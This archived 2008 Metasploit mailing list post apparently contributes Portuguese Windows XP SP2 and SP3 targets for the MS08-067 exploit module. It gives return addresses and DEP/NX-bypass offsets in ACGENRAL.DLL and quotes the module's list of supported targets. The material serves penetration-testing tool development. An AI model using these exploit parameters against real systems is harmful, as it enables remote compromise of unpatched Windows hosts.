Metasploit mailing list archives

MS08-067 added to SVN trunk (3.2-testing)


From: vsantola at sectoid.com (Valter Santos)
Date: Sat, 1 Nov 2008 16:05:48 +0000

Here are the targets for Portuguese (Portugal) XP SP2 and SP3. The XP
SP2 opcodes used are the same than for the italian version, don't know
if this will be true for SP3:


    # Metasploit's NX bypass for XP SP2
    # Target provided by <vsantola at sectoid.com>
    #
    [ 'Windows XP SP2 Portuguese (Portugal) (NX)',
     {
           'Ret'       => 0x596bf727,
           'DisableNX' => 0x596c16e2,
           'Scratch'   => 0x00020408,
     }
    ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL



    # Metasploit's NX bypass for XP SP3
    # Target provided by Valter Santos <vsantola at sectoid.com>
    #
    [ 'Windows XP SP3 Portuguese (Portugal) (NX)',
      {
             'Ret'       => 0x596bf807,
             'DisableNX' => 0x596c17c2,
             'Scratch'   => 0x00020408,
      }
     ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL


cheers,
/valter

On Fri, Oct 31, 2008 at 5:16 AM, H D Moore <hdm at metasploit.com> wrote:
New targets:

  0   Windows 2000 MS06-040+ (YMMV pre MS06-040)
  1   Windows XP SP2 English (NX)
  2   Windows XP SP2 Italian (NX)
  3   Windows XP SP2 Spanish (NX)
  4   Windows XP SP2 Chinese (NX)
  5   Windows XP SP3 English (NX)
  6   Windows XP SP3 German (NX)
  7   Windows 2003 SP0 English (NO NX)
  8   Windows 2003 SP2 English (NO NX)
  9   Windows 2003 SP2 English (NX)

This list incorporates all of the new targets sent in by list members as
well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's
Windows 2000 near-universal. Thanks again and please send in the ret/nx
addresses for any of the missing targets (SP3 chinese,spanish,italian),
(SP2 german).

-HD
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




Current thread: